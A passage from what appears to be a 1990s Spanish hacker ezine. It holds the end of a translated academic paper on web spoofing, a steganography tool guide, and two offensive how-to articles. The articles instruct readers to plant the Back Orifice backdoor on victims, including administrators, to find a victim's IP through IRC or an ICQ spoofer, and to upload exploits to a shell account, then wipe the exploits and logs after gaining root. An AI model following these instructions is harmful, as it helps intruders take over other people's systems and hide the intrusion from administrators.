direccion apuntaba  completamente  a otro.  Por  cierto,  los simbolos  
redondos  de MICR0S0FT  aqui son el
numero cero,  no la  letra O.) Era  dole96.org la  campaa presidencial  de 
1996 de Bob Dole? (No lo era, apuntaba a un site de parodia).

La gente a  menudo toma el contexto  segun la  fecha de los hechos. Si ocurren 
dos cosas al mismo tiempo,  naturalmente piensas que  estan relacionadas. Si 
haces click hacia la pagina de tu banco y aparece un cuadro de dialogo 
solicitando  un nombre  de usuario/password, naturalmente asumiras que debes  
teclear el nombre  y password  que usas para  el  banco. Si  haces click  en 
un link y comienza a  bajarse immediatamente un  documento, asumes que  el 
documento  venia  del site  cuyo link clickeaste. Cualquier suposicion podria 
ser incorrecta.

Si solo  ves una ventana del navegador cuando ocurre un evento, podrias no 
darte cuenta de que el evento fue creado por otra ventana escondida detras de 
la que es visible.

Los  diseadores  de  entornos  de  usuario  modernos  emplean  su  tiempo   
intentando  concebir indicaciones contextuales  que hagan que  la gente  actue 
apropiadamente, incluso si no advierten explicitamente las  indicaciones. 
Mientras  esto es  siempre beneficioso, puede hacerse peligroso cuando la 
gente esta acostumbrada a fiarse del contexto que no siempre es correcto.


TCP y DNS Spoofing
------------------

Otra clase  de ataque  spoofing, que no  discutiremos aqui, engaa al software 
del usuario en una accion inapropiada  presentandole informacion enagaosa 
[3].  Ejemplos de dichos ataques incluyen el TCP  spoofing [4], en  el que los 
paquetes de  Internet son enviados con direcciones de vuelta falseadas, y el 
DNS spoofing  [5], en el que el atacante falsea informacion acerca de que 
nombres de maquina  corresponden a  que  direcciones  de red.  Estos  otros  
ataques  spoofing  son  bien conocidos, asi que no los discutiremos mas en 
detalle.


Web Spoofing
------------

El Web  spoofing es un  tipo de  estafa electronica en  la que  el atacante 
crea  una convincente pero falsa copia de toda la  World Wide Web. La Web 
falsa es como la real: tiene todas las mismas paginas y links. Sin embargo,  
el atacante controla la  falsa Web, de manera  que todo el trafico de red 
entre el navegador de la victima y la Web pasa por el atacante.


Consecuencias
-------------

Ya que  el atacante  puede observar  o modificar  cualquier dato  que vaya  de 
la  victima  a los servidores Web,  como tambien  controlar todo  el trafico  
de vuelta  de los  servidores Web a la victima, el  atacante tiene  muchas 
posibilidades.  Estas incluyen  la vigilancia  y  el amao de datos.

Vigilancia: El  atacante  puede observar  pasivamente el  trafico, anotando 
que paginas visita la victima y  los contenidos  de las  mismas. Cuando  la 
victima  rellena un  formulario, los  datos introducidos son  enviados a un 
servidor Web, de manera que el atacante puede anotar eso tambien, junto con la 
respuesta enviada por el servidor. Ya que la mayoria del comercio on-line se 
realiza por  medio de formularios, esto  significa que  el atacante  puede 
observar  cualquier numero  de cuenta o passwords que la victima meta.

Como veremos  abajo, el  atacante puede  llevar a  cabo la vigilancia incluso 
si la victima tiene una conexion  "segura" (normalmente  por medio  de Secure  
Sockets Layer)  al servidor,  esto es, incluso si  el navegador  de  la 
victima  muestra el  icono de  conexion  segura (normalmente una imagen de un 
candado o una llave).

Amao: El  atacante  es  tambien libre  de  modificar  cualquiera de  los  
datos  que  viajen  en cualquiera de  las direcciones  entre la  victima y  el 
Web.  El atacante  puede modificar  datos del formulario  enviado por  la 
victima.  Por ejemplo,  si  la victima  esta pidiendo un producto on-line, el 
atacante  puede cambiar el  numero del producto,  la cantidad, o  la direccion 
a  que debe ser enviado.


El  atacante puede  tambien modificar  los datos  devueltos por  un  servidor  
Web,  por  ejemplo insertando material  engaoso u  ofensivo para engaar a la 
victima o para crear hostilidad entre la victima y el servidor.


Spoofing de toda la Red
-----------------------

Puedes pensar  que es muy  dificil para  el atacante el trucar toda la World 
Wide Web, pero no lo es. El  atacante no necesita  guardar todo  el contenido 
de  la Red.  Toda la Web esta disponible on-line; el  servidor del  atacante 
puede  simplemente traer  una pagina  de la  Web real  cuando necesita 
proporcionar una copia de la pagina a la Web falsa.


Como Funciona el Ataque
-----------------------

La clave  de este  ataque es  que el  servidor Web  del atacante  se siente 
entre la victima y el resto  de  la  Red. Este tipo  de  procedimiento se 
llama  "ataque de  hombre  en  medio"  en  la literatura de seguridad.


Renombramiento de URL
---------------------

El primer  truco del  atacante consiste  en reescribir  todas las  URLs de  
alguna pagina  Web de manera  que  apunten al  servidor  del  atacante  en  
vez de  hacia  aquellos  servidores reales.
Asumiendo  que  el  servidor  del atacante  este en  la  maquina  
www.attacker.org, el atacante reescribe una URL aadiendo 
http://www.attacker.org delante  de   la  URL.  
Por   ejemplo, 
http://home.netscape.com 
se convierte en: 
http://www.attacker.org/http://home.netscape.com 
(La  tecnica de  renombramiento de  URL  ha sido usada para  otras razones  
por otros  dos Web  sites, the  Anonymizer y the Zippy filter. Mira la ultima 
pagina para detalles.)

La ilustracion  1 muestra lo  que ocurre cuando la victima pide una pagina a 
traves de una de las URLs renombradas.  El navegador de  la victima  pide la 
pagina desde www.attacker.org , ya que la URL comienza  con http:// 
www.attacker.org.  La notificacion  de la  URL  le dice al servidor del 
atacante a que lugar de la Red ir para coger el documento verdadero.

Una vez que  el servidor del  atacante ha pillado  el documento real necesario 
para satisfacer el pedido, el  atacante reescribe todas  las URLs  del 
documento  del mismo modo especial empalmando http://www.atacker.org/ delante.  
Entonces el  server del  atacante  le da la pagina reescrita al navegador de 
la victima.

Ya que todas  las URLs de  la pagina reescrita  apuntan ahora a  
www.attacker.org , si la victima sigue un  link de la  nueva pagina,  la 
pagina  sera de nuevo  pillada a  traves del servidor del atacante. La victima  
continua atrapada en  la Web falsa  del atacante, y  puede seguir links por 
siempre sin abandonarla.


Formularios
-----------

Si la  victima rellena un formulario de una pagina de la Web falsa, el 
resultado parece que haber sido bien manejado. El  spoofing de  formularios 
funciona naturalmente  ya  que  los  formularios estan estrechamente  
integrados en  los protocolos  de Web  basicos: los  envios  de  formularios 
estan codificados  en URLs  y las  respuestas son HTML  ordinario. Ya que 
cualquier URL puede ser "spoofeada", los formularios tambien.

Cuando la  victima envia un  formulario, los datos  enviados van al  servidor  
del  atacante.  El servidor del  atacante puede  observar e incluso modificar 
los datos enviados, haciendo cualquier edicion maligna que se desee, antes de 
pasarlo  al  servidor real. El servidor del atacante puede tambien modificar 
los datos que vuelven como respuesta a el formulario enviado.


Las conexiones "Seguras" no ayudan
----------------------------------

Una angustiosa  propiedad  de  este ataque  es  que  funciona incluso  cuando 
la victima pide una pagina por  medio de  una conexion  "segura". Si  la 
victima  hace  un acceso de Web "seguro" (un acceso Web  usando el  Secure  
Sockets Layer)  en una  Web falsa, todo parecera normal: la pagina sera 
mostrada,  y el  indicador de  conexion segura  (normalmente una  imagen de  
una  candado  o llave) se encendera.

El  navegador  de  la  victima  reporta  que  tiene  una  conexion  segura  
por  que   la  tiene.
Desafortunadamente la  conexion segura es a www.attacker.org y no al sitio que 
la victima piensa.
El navegador de la victima piensa  que todo  va bien:  se  le  dijo que  
accediese a  una  URL en www.attacker.org asi  que hizo  una conexion segura  
a www.attacker.org. El indicador de conexion segura solo da una sensacion 
falsa de seguridad a la victima.


Comenzando el Ataque
--------------------

Para empezar un ataque,  el atacante  debe de algun  modo atraer  a la victima 
a la Web falsa del atacante. Hay  varios modos de  hacer esto.  Un atacante 
podria  poner un link a una Web falsa en una pagina Web popular.  Si la  
victima  tiene el mail  del navegador activado, el atacante puede mandar un 
mail a  la victima  con  un indicador  a la Web  falsa, o incluso los 
contenidos de una pagina en  una Web falsa.  Finalmente, el atacante  puede 
engaar a un motor de busqueda Web para que indexe parte de la Web falsa.


Completando la Ilusion
----------------------

El ataque como  se ha descrito  hasta aqui es  bastante facil, pero  no es 
perfecto.  Hay todavia algun contexto permanente  que puede dar  a la victima 
pistas de que el ataque se esta llevando a cabo. Sin  embargo, es  posible 
para  el atacante  el eliminar  practicamente  todas  las  pistas restantes de 
la existencia del ataque.

Dicha evidencia  no es  muy  dificil de  eliminar por  que los navegadores son 
muy manejables. La habilidad de  una pagina  Web para  controlar el  
comportamiento de  un  navegador  es  a  menudo deseable, pero cuando la 
pagina es hostil puede ser peligroso.


La Barra de Estado
------------------

La barra  de estado  es una  sola linea  de texto  situada debajo de la 
ventana del navegador que muestra varios mensajes, normalmente sobre el estado 
de transferencias Web pendientes.

El ataque  como se  ha descrito hasta aqui, deja dos tipos de evidencia en la 
barra de estado. El primero, cuando el raton  se situa sobre un  link, la 
barra de  estado muestra la URL a la que el link apunta.  Asi, la  victima 
podria  darse cuenta  de que  una URL  ha sido reescrita. Segundo, cuando una 
pagina se  esta cargando, la barra de estado muestra brevemente el nombre del 
servidor
que se  esta contactando.  Asi,  la victima  podria notar que se esta 
mostrando  www.attacker.org cuando en realidad se esperaba otro nombre.

El atacante puede  cubrir ambas  indicaciones aadiendo  un programa 
JavaScript a cada una de las paginas reescritas.  Ya  que los programas 
JavaScript pueden escribir en la barra de estado, y ya que es  posible 
vincular acciones JavaScript a los eventos relevantes, el atacante puede 
arreglar las cosas de modo que la barra de  estado participe  en la estafa, 
mostrando siempre a la victima lo que debia haber aparecido en la barra de 
estado en la  Web  real. Asi  el falseado contexto se hace incluso mas 
convincente.


La Linea de Localizacion
------------------------

La linea  de localizacion  del navegador muestra  la URL  de la pagina  que 
esta mostrando en ese momento. La victima  puede tambier teclear  la URL  en  
la linea  de localizacion,   enviando  al navegador a esa  URL. El ataque  
como se ha  descrito hasta aqui  hace aparecer una URL reescrita en la linea 
de localizacion,  dando a la victima una posible indicacion de que se esta 
cometiendo un ataque.

Esta pista  puede ser ocultada  usando JavaScript.  Un programa JavaScript 
puede ocultar la linea de localizacion real y  reemplazarla por una linea de 
localizacion falsa que parece correcta y se encuentra en el lugar esperado.  
La linea  de localizacion  falsa puede  mostrar la  URL  que  la victima 
espera  ver. La  linea de localizacion  falsa puede  tambien aceptar entradas 
de teclado, permitiendo a la victima teclear  URLs normalmente. Las URLs 
tecleadas  pueden ser reescritas por el programa JavaScript antes de que se 
acedan a ellas.


Viendo el Codigo Fuente del Documento
-------------------------------------

Hay una pista que el atacante no puede eliminar, pero es poco probable que sea 
notada.

Usando la  opcion de  "ver codigo" del  navegador, la  victima puede  mirar el  
codigo HTML de la pagina  actualmente  mostrada. Buscando URLs  reescritas  en 
el  codigo  HTML, la  victima  puede detectar el  ataque. Desafortunadamente, 
el codigo HTML es dificil de leer para usuarios novatos, y muy pocos 
navegantes se molestan en mirar el codigo HTML de los documentos que estan 
visitando, asi que esto provee muy poca proteccion.

Una pista parecida esta disponible si la victima elige la opcion "ver 
informacion del documento" del navegador. Esto mostrara informacion incluyendo  
la  URL real  del  documento,  permitiendo posiblemente a la victima  darse 
cuenta del ataque. Como arriba, esta opcion no se usa casi nunca asi que es 
muy poco probable que proporcione mucha proteccion.


Bookmarks
---------

Hay varias formas de que la victima pueda dejar accidentalmente la Web falsa 
del atacante durante el ataque. Accediendo a las bookmarks  o saltando a una 
URL usando la opcion "Abrir localizacion" del navegador  podria llevar  a la  
victima de  vuelta a  la Web real. La victima podria entonces volver a  entrar 
a la Web  falsa pulsando el boton "Back". Podemos imaginar que la victima 
podria ir entrando  y saliendo de  una o mas  Webs falsas. Por  supuesto, las  
bookmarks pueden  tambien funcionar contra la  victima, ya  que es posible el  
aadir un  bookmark de una  pagina de la Web falsa. El saltar a dicha bookmark 
llevaria a la victima de vuelta a la Web falsa.


Traceando al Atacante
---------------------

Algunas personas han  sugerido que este  ataque puede ser  disuadido 
encontrando y  castigando al atacante. Es  cierto que el  servidor del 
atacante debe revelar su localizacion de modo que pueda llevar  a cabo  el 
ataque,  y la  evidencia  de esa  localizacion estara disponible practicamente
seguro despues de que se detecte un ataque.

Desafortunadamente, esto  no ayudara  mucho en la  practica ya que los 
atacantes irrumpiran en la maquina de  alguna persona  inocente y  lanzaran el  
ataque alli.  Se usaran  maquinas robadas en estos ataques  por la  misma 
razon que la mayoria de los ladrones de banco realizan sus huidas en coches 
robados.


Remedios
--------

El  Web spoofing  es un  ataque de  seguridad peligroso y practicamente 
indetectable que se puede llevar a  cabo en  la Internet de  hoy en  dia. 
Afortunadamente hay algunas medidas de proteccion que puedes tomar.


Solucion a Corto-plazo
----------------------

A corto plazo, la mejor defensa es el seguir una estrategia de tres partes:

1. deshabilita  la opcion de  JavaScript en tu navegador de modo que el 
atacante no podra ocultar la evidencia del ataque;
2. asegurate de que la linea de localizacion de tu navegador este siempre 
visible;
3. presta atencion a las URLs mostradas en la linea de localizacion de tu 
navegador, asegurandote de que siempre apunten al servidor al que piensas que 
estas conectado.

Esta estrategia disminuira significativamente el riesgo de ataque, aunque 
podrias aun ser victima si no eres consciente de mirar la linea de 
localizacion.

Actualmente,  JavaScript, ActiveX  y  Java tienden  a  facilitar el  spoofing  
y otros ataques de seguridad, asi  que recomendamos  que los  deshabiliteis. 
Haciendolo  causara que  pierdas cierta funcionalidad, pero  puedes compensar  
mucha de  esta perdida  habilitando  selectivamente  estas caracteristicas 
cuando visites un site de confianza que los requiera.


Solucion a Largo-plazo
----------------------

No conocemos una solucion a largo-plazo totalmente satisfactoria para este 
problema.

El cambiar los navegadores de modo que muestren siempre la linea de 
localizacion ayudaria, aunque los usuarios aun tendrian que estar atentos y 
saber como reconocer URLs reescritas.

Para las paginas que no son traidas via conexion segura, no hay mucho mas que 
se pueda hacer.

Para  las paginas  traidas via  conexion segura,  un indicador de conexion-
segura mejorado podria ayudar. En  vez de  indicar simplemente una  conexion  
segura,  los  navegadores  deberian  decir claramente quien  esta al otro  
lado de  la conexion. Esta  informacion deberia  ser mostrada con un lenguaje  
claro, de  forma  entendible para  los usuarios  novatos; deberia  decir  algo  
como "Microsoft Inc." en vez de "www.microsoft.com".

Todo acercamiento a este problema parece depender de la vigilancia de los 
usuarios de Web. Aunque podamos realmente esperar que todo el mundo este 
atento es siempre discutible.


Trabajos Relacionados
---------------------

Nosotros  no inventamos  la tecnica  de reescritura de URL. Previamente, la 
reescritura de URL ha sido usada como una tecnica para proporcionar servicios 
utiles a gente que los ha pedido.

Sabemos de la  existencia de dos servicios que usan la reescritura de URL. El 
Anonymizer, escrito por Justin  Boyan en Carnegie  Mellon University,  es un 
servicio  que permite  a los usuarios el navegar por la Red sin revelar sus 
identidades a los sites que visitan. The Zippy filter, escrito por Henry  
Minsky, presenta una  vision  divertida  de la Red  con  dichos  de  Zippy-
the-Pinhead insertados aleatoriamente.
Aunque nosotros  no inventamos  la reescritura  de URL,  creemos que somos los 
primeros en darnos cuenta de su total potencial como un componete de un ataque 
de seguridad.


Agradecimientos
---------------

La  parte de  reescritura de  URL de nuestro programa de demostracion esta 
basada en el codigo de Henry Minsky para  el Zippy filter.  Agradecemos a  
David Hopwood  sus utiles  comentarios  sobre ataques  spoofing, y a  Gary 
McGraw  y Laura  Felten sus  comentarios sobre  el borrador  de este 
documento. 


Para Mas Informacion
--------------------

Mas informacion disponible en nuestra pagina web en:
http://www.cs.princeton.edu/sip , o del
Profesor Edward Felten en felten@cs.princeton.edu  o en el (609) 258-5906


Referencias
-----------

[1] Peter G. Neumann. Computer-Related Risks. ACM Press, New York, 1995.

[2] Gary McGraw and Edward W. Felten. Java Security: Hostile Applets, Holes 
and Antidotes. John Wiley and Sons, New York, 1996.

[3] Robert T. Morris. A Weakness in the 4.2BSD UNIX TCP/IP Software. Computing 
Science Technical Report 117, AT&T Bell Laboratories, February 1985.

[4] Steven M. Bellovin. Security Problems in the TCP/IP Protocol Suite. 
Computer Communications Review 19(2):32-48, April 1989.

[5] Steven M. Bellovin. Using the Domain Name System for System Break-ins. 
Proceedings of Fifth Usenix UNIX Security Symposium, June 1995.

[6] Web site at http://www.anonymizer.com

[7] Web site at http://www.metahtml.com/apps/zippy/welcome.html


Traduccion
----------

Traducido por [Tosh]
BBK "Big Bro Killerz"
bigbrokill@hotmail.com
http://www.geocities.com/SiliconValley/Pines/7347/

-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|

		   Ļ
		                                         
		             PELIGRO EN WINDOWS          
		      Original de Yo Soy para RareGaZz   
		     =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
		   ļ

 Al parecer el uso de ciertas utilidades para tener acceso sobre plataformas
 windows, estan creciendo, tan solo unos ejemplos son: el hacer Spoofing
 a usuarios de ICQ o conectarse remotamente con aplicaciones que actuan como
 "backdoors" permitiendo asi la entrada a personas desconocidas al sistema.

 Un ejemplo de estas "backdoors" es el famoso programa - Back Orifice - ,
 este ultimo del grupo cDc (Cult of Dead Cow). El usuario fisico ejecuta el
 programa que funciona como "servidor" para el programa "cliente". La persona
 que tiene el programa cliente tiene dominio sobre el sistema, pudiendo hacer
 por ejemplo: Ejecutar aplicaciones, abrir un puerto para entrar via http,
 subir y bajar archivos, asi como eliminalos y modicarlos, ver lo que escribe
 el usuario en la pc remota, ver su pantalla, abrir la unidad de cd-rom, solo
 por decir algunas cuantas...

 De echo, la persona que ejecuta el programa "servidor", ni cuenta se da de
 que ha dejado su sistema a merced del "intruso"; quien, si es malicioso
 intentara joder el sistema de alguna manera. El programa se auto-copia a
 otra locacion dentro del mismo disco duro , modifica el registro del sistema
 de manera que cada vez que se inicie windows se auto-ejecute, impidiendo asi
 que el usuario lo note facilmente.

 TU MISMO puedes estar bajo estas influencias ahora mismo y ni siquiera lo
 sabes.... 

 Las posibilidades son infinitas ( te imaginas mandar el backdoor a un admin
 que utilice NT, jaja, tendremos control sobre las cuentas y todo el sistema).

 Microsoft fue notificado, podemos ver unos cuantos bytes sobre el tema en:
 http://www.microsoft.com/security/bulletins/ms98-010.htm

 E ISS's no se queda atras:
 http://www.iss.net/xforce/alerts/advise5.html

  
 __ UTILIZANDO LAS BACKDOORS...


 Pues esto esta muy facil, tienen que empaquetar el programa "server" del
 programa en cuestion (patch.exe o boserver.exe ) y enviarlo a la "victima"
 quien lo ejecutara y asi te podras conectar tu... (no tiene mucho chiste...)
 Por cierto el BO hay una version para Unix/Linux.

 - Desventajas:


   __ Ya lo hice, pero como me conecto si no tengo su IP ?

   Pues la principal desventaja es que tienes que investigar la ip del
   usuario victima para poder hacer la conexion, esto no es muy dificil si
   estamos via IRC con el comando /dns nick_victima y con ICQ utilizando la
   opcion info, o si esta escondida, utilizando el ICQ Spoofer ;)
   [Disponible ya en la web de RareGaZz]

   __ Ya lo hice, pero no tiene ICQ y no esta via irc...

   En caso de que se trate de algun Admin de un server, pues prueba con su
   dominio y en la mayoria de los casos funciona.
					
   __ Nope, se trata de un amigo al que le quiero jugar una broma..

   Ups!, si se trata de un usuario con I.P dinamica, pues ya valiste..
   Tendras que ingeniartelas para obtener su I.P...(de esta forma no estas
   de lamercillo destruyendo sistemas..)

   __  Oh! Diablos!! Ejecute boserve.exe en mi maquina!!!..

   Jajaja!!! que cosa :P, bueno no todo esta acabado, existe un programa
   llamado B.O.R.E.D. (Back Orifice Recognition, Extraction and Deletion)
   que se encarga de protegerte del uso de Back Orifice (huy... que miedo :)
   [ Proximamente en la web de RareGaZz ]

   <->

   Saludos a: #RaZa-MeXiCaNa Red Latina, dR-SeuSs, Megaflop, xDAWN, GuyBrush,
   Acidgum, He|io, PlaXiuS, SufferBoy, y los demas... :)

						<=Yo-Soy=> varf@bigfoot.com

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

		   Ļ
		                                         
		         INTRODUCIENDO TUS EXPLOITS      
		        por Yo Soy (varf@bigfoot.com)    
		     =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
		   ļ


  Digamos que tienes una cuenta en un sistema y que vas a hacer unas cuantas
  cosas divertidas ;) ... Bueno , conseguimos unos exploits en nuestro lugar
  preferido ( Bugtraq, Rootshell o RareGaZz :D , etc ) y Ohh que diablos !
  Como los introduzco ?
  
  Bueno, aqui podemos hacer varias cosas:

  a) Usar el FTP para subirlos al home de la cuenta (algo sospechoso)
  b) Mandarlos via e-mail (menos sospechoso)
  c) Escribirlos directamente en la shell (menos sospechoso y mas tardado)
 

  A) FTP

    Muy simple, utilizando el comando ftp o con un cliente ftp
    nos conectamos al host que queremos, subimos los archivos y ya..
    ( no es muy recomendable, pues deja logs, si el admin se pone a ver
    se dara cuenta que un hacker le andaba por ahi, sobre todo si tus
    exploits fallan... )

  B) E-MAIL

    Esta forma seria menos sospechosa, pues los usuarios utilizan el
    correo en forma normal y no se notaria el asunto de nuestros
    programillas, seria casi indetectable, pero puede tener el
    inconveniente de ser tardado, dependiendo de la distancia entre
    tu y el host...

   C) ESCRIBIENDOLOS

    Aqui utilizariamos un editor y estariamos como weyes escribiendo
    letra por letra todo el fucking exploit, pero hay una forma mas
    facil que es utilizando el comando cat e ir pegando el exploit
    a la terminal.

      Ejemplo:

      varf:~:$ cat > mundo.c << STOP
      #include <stdio.h>

      main()
      {
      printf("Hola mundo! :P\n"):
      }
      STOP
      varf:~:$
      varf:~:$ cat mundo.c
      main()
      {
      printf("Hola mundo! :P\n"):
      }
      varf:~:$
      varf:~:$ cc -o mundo mundo.c
      varf:~:$ mundo
      Hola mundo! :P
      varf:~:$

    Aqui utilizamos "cat > nombre.c << STOP" para meter los archivos desde
    la terminal, pudiendo cortar el contenido desde otro editor y despues
    pegarlo en la terminal, despues cuando escribimos STOP se detiene la
    forma de introducir infromacion y se salva el archivo. Despues usamos
    cat de nuevo para ver como quedo el archivo, y vemos que la palabra
    STOP no se quedo en el contenido del archivo, despues compilamos con
    cc y ya... facil :)

    Recuerda siempre borrar los exploits (funcionen o no), y si consigues
    root eliminar las pocas huellas que hay para que el admin no se ponga
    sospechoso...  Disfruten...                                

						    <=>  Original en CRH #2

ͻ
ͻ
ͻ
               ESTEGANOGRAFIA O EL ARTE DE ESCONDER LOS DATOS           
                               por PaTa                                 
ͼ
ͼ
ͼ

	Que es la esteganografia? te preguntaras,  bueno pues  es un conjunto
de tecnicas que nos permiten ocultar cualquier tipo de datos.

	La  diferencia  entre  esteganogarfia y criptografia,  es  muy  simple
mientras que la criptografia modifica  los datos para que no sean legibles, de
todos es sabido la forma de trabajar del pgp,  la  esteganografia  simplemente
los oculta, aunque hoy en dia ambas tecnicas son facilmente compatibles con el
uso de los ordenadores actuales.

	Esta tecnica no es nada nueva, data de bastante tiempo, por ejemplo en
la  segunda  guerra mundial los aliados usaban esta  tecnica  para comunicarse
con la resistencia alemana por medio de cartas.  

	La innovacion en esta tecnica se ha dado  gracias  a  la llegada de la
informatica y los  ordenadores, se ha pasado de por ejemplo escribir con tinta
invisible que solo se ve al acercar una fuente de calor, cosa  que todos hemos
visto  en  las peliculas de espias, a modificar archivos de audio  o  graficos
para que estos contengan a su vez otros archivos.

	La esteganografia  nos puede servir para comunicarnos sin que la gente
se de cuenta ya que por ejemplo   si  usas el pgp la gente piensas que ocultas
algo, cosa que a mi me sucede yo tengo un amigo, al que le digo que use el pgp
para comunicarse conmigo y el me dice  que  no  tiene nada ilegal que decirme,
espero que al leer esto cambies de idea :o) bueno  como  dice  Phil  Zimmerman
autor del pgp "Si se convierte la privacidad en algo ilegal, solo los ilegales
tendran privacidad".

	El medio ideal para usar la estaganografia es aquel en donde se suelen
realizar escaneos automatizados de mensajes, o donde puede ser sospechoso usar
otros  medio de encriptacion criptografica, por ejemplo si en el trabajo  usas
continuamente  pgp  pueden  que  alli  alguien  se  empice a mosquear, o si la
paranolla   invade   tu   vida :o)  para  esos  momentos  nada  mejor  que  la
esteganografia.


	Aunque claro segun  donde estemos no podemos dar un salto radical a la
esteganografia, si estamos trabajando, y usamos continuamente pgp, y cambiamos
de la noche al dia a la esteganografia,  podemos  levantar sospechas, para eso
es mejor una  preparacion del entorno,   en   ese   caso   deberiamos  empezar
a  interesarnos  por  las matematicas del caos y fractales, y  despues  de  un
tiempo empezar a intercambiar  fractales  con nuestro anterior comunicante del
pgp.

	Por lo que todo el mundo debe tener  precauciones  en sus mensajes por
mail si no ya se esta viendo lo que le esta pasando a Bill Gates, y sus mail a
sus subordinados, en el juicio anti-monopolio en E.E.U.U.

	El correo electronico poco a poco va sustituyendo al normal,  en todos
los  aspectos  pues  de  todos es conocida su aplastante  superioridad sera la
norma para todo el mundo, no la novedad que es hoy en dia.

	Los  gobiernos   no  solo  el  norteamericano tambien recientemente el
espaol con su articulo 52 pretenden  proteger  nuestro correo electronico con
sistemas de encriptacion diseados por ellos.  Probablemente  la  mayor  parte
de la gente aceptara eso. Pero quizas algunos prefiraos utilizar otras medidas
propias, si o  recordemos  el  DES  vencido  en tres horas y con un  ordenador
de tan solo cuarenta millones de pesetas.


	Las  agencias de inteligencia  tienen  acceso  a  buenos  sistemas  de
criptografia,   tambien  los grandes traficantes de armas y drogas. Igualmente
los fabricantes, las multinacionales  y  otros  gigantes corporativos. Pero la
gente  normal  y  corriente, las organizaciones de   andar por casa, no tienen
acceso a tecnologia ,pero se puede resolver con otro tipo de tecnicas, como la
esteganografia.

	Ahora voy a poner algunos programas y su uso mas basico:



      ͻ
                                TEXTO                              
      ͼ

        Texto,  que  a  pesar  de su nombre no es un programa espaol, ha sido
escrito por Kevin Maher, y es un  programa que transforma archivos codificados
con uuencode o archivos encriptados  con  PGP  con  ASCII armor en archivos de
texto que contienen frases en ingles.

        Los  textos  producidos  por  Texto  son,  ante  todo,  extraos.  Los
aficionados al surrealismo disfrutaran con este programa.

        Aqui teneis un pequeo ejemplo:

The printer weakly leans to the cold planet. I outwit bright units near the
new cosmetic barn. Sometimes, hats count behind cold windows, unless they're
cosmetic. Never count strangely while you're riping through a cold car. We
easily love around secret clear monoliths. While pins really learn, the cats
often eat on the ajar hens. Other usable strange games will darken fully with
forks. Going below a corner with a brush is often tall. Have a filthy pool.
The cosmetic floor rarely dreams. Tell the clear book it's fully tooting
against a dust. Many clear powerful eggs will smile slowly to pools. To be
dense or dense will cause sly pins to float. Will you question the quiet cold
codes? Let's connect near the obtuse cafes, but don't write the filthy papers.

	Texto  sustituye  los  caracteres  ASCII  por  palabras  en ingles que
obtiene  de un archivo llamado words. Despues utiliza estas palabras segun las
estructuras  de  frases  contenidas en un archivo llamado structs, creando asi
el texto en ingles.

	El  gran  problema  que tiene este programa: el texto obtenido es DIEZ
VECES mayor que el archivo original.

	Otros  dos  inconvenientes,  de mucho menor importancia tienen que ver
con el uso de archivos codificados con  uuencode:  el primero es que se pierde
la informacion  sobre  el  nombre y el modo de acceso del archivo original; el
segundo es que el texto producido puede llegar a ser demasiado repetitivo.


Ejemplos

texto archivo_encriptado > archivo_de_texto

Transforma el contenido  de archivo_encriptado (un archivo PGP con ASCII armor
o un archivo codificado con uuencode) en texto en ingles.

texto -p archivo_de_texto > archivo_PGP

Convierte el texto en  ingles  de archivo_de_texto en un archivo PGP con ASCII
armor.

texto -u archivo_de_texto > archivo_uuencode

Lo mismo que el anterior ejemplo, pero con uuencode.



      ͻ
                              MANDELSTEG                           
      ͼ

	El  programa  Mandelsteg  ha  sido  escrito  por  Henry Hastur y puede
distribuirse gratuitamente.  Esta  en  realidad  formado  por  dos  programas:
mandelsteg,  que  genera  archivos  gif  de fractales de Mandelbrot en los que
guarda  los  datos  que  se  pasan  como  entrada   segun   las  opciones  que
indiquemos en  linea  de comandos, gifextract, que toma las imagenes generadas
por mandelsteg y extrae los datos.

	Mandelsteg tiene  diversas  opciones  que utilizaremos dependiendo del
nivel de seguridad deseado.

       Si simplemente ejecutamos mandelsteg sin opciones, el programa generara
un gif de 640x480 de la seccion del conjunto por   defecto  de  un  fractal de
Mandelbrot.  Con  la  opcion -c, calculara cuantos bytes pueden almacenarse en
la imagen, y con -e tomara  los  datos  de  la  entrada y los almacenara en la
imagen. Podemos especificar un nombre de archivo despues de -e para el archivo
gif. Con -r, generara bytes aleatorios que colocara en la imagen, de forma que
podremos generar imagenes sin datos verdaderos para crear confusion.

	Con el nivel  de  seguridad  minimo  que proporciona la opcion -e, los
datos seran guardados en el bit 7 de cada pixel y   se generara  una paleta de
128  colores de tal forma que los pixels tengan el mismo aspecto,  contengan o
no da tos. Esto es suficiente para burlar vigilancias inexpertas, pero alguien
que conozca  estas  tecnicas podra descubrir facilmente que la imagen contiene
datos.  Por  ejemplo,   sustituyendo  la  paleta  por  otra,  se  distinguiran
claramente los datos ocultos  en areas de la imagen donde hay colores solidos.
Esto se puede evitar con la opcion -ns,  que hara  que se almacenen datos solo
en  areas  donde   no  haya  colores  solidos.  Eso  si,  esta  opcion  reduce
drasticamente el numero  de datos que puede almacenar la imagen, asi que antes
de utilizarla "directamente", conviene hacer primero una prueba con la opcion
-c.

Ejemplos

mandelsteg -e fractal.gif < archivo.txt

Genera un fractal que almacena  en fractal.gif, imagen de 640x480, e introduce
los datos de archivo.txt.

mandelsteg -sz 400 400 -md -0.5505 -0.5505 0.0001 0.0001 -e fractal.gif
< archivo.txt

Crea un fractal utilizando coordenadas distintas de las empleadas por defecto,
lo almacena en una imagen de 400x400 e introduce los datos de archivo.txt.

mandelsteg -ns -sz 320 240 -c > /dev/null

Muestra por pantalla la cantidad de   informacion  que  puede almacenar en una
imagen de las caracteristicas indicadas.

mandelsteg -fp -r -ns -e falso.gif < /dev/null

Crea  un  fractal  que  almacena  en falso.gif y que contiene datos aleatorios
(util para despistar o hacer perder tiempo).

Por cierto, salvo que se tenga un  Pentium  potente, hay que ser pacientes con
este programa. El calculo de fractales supone muchas operaciones en coma
flotante...



      ͻ
                              GIFEXTRACT                           
      ͼ

Gifextract  simplemente  toma  como  entrada una imagen y extrae los datos que
contiene  por  defecto, los extraera del  bit 7,  asi  que  si almacenamos los
datos en algun bit  distinto, habra que indicarselo con la opcion -b.  Tambien
si usamos la opcion -ns o -bp  al  generar la imagen con mandelsteg, habra que
utilizarlas con gifextract para extraer los datos correctamente.


Ejemplos

gifextract -b 4 < imagen.gif > datos.txt

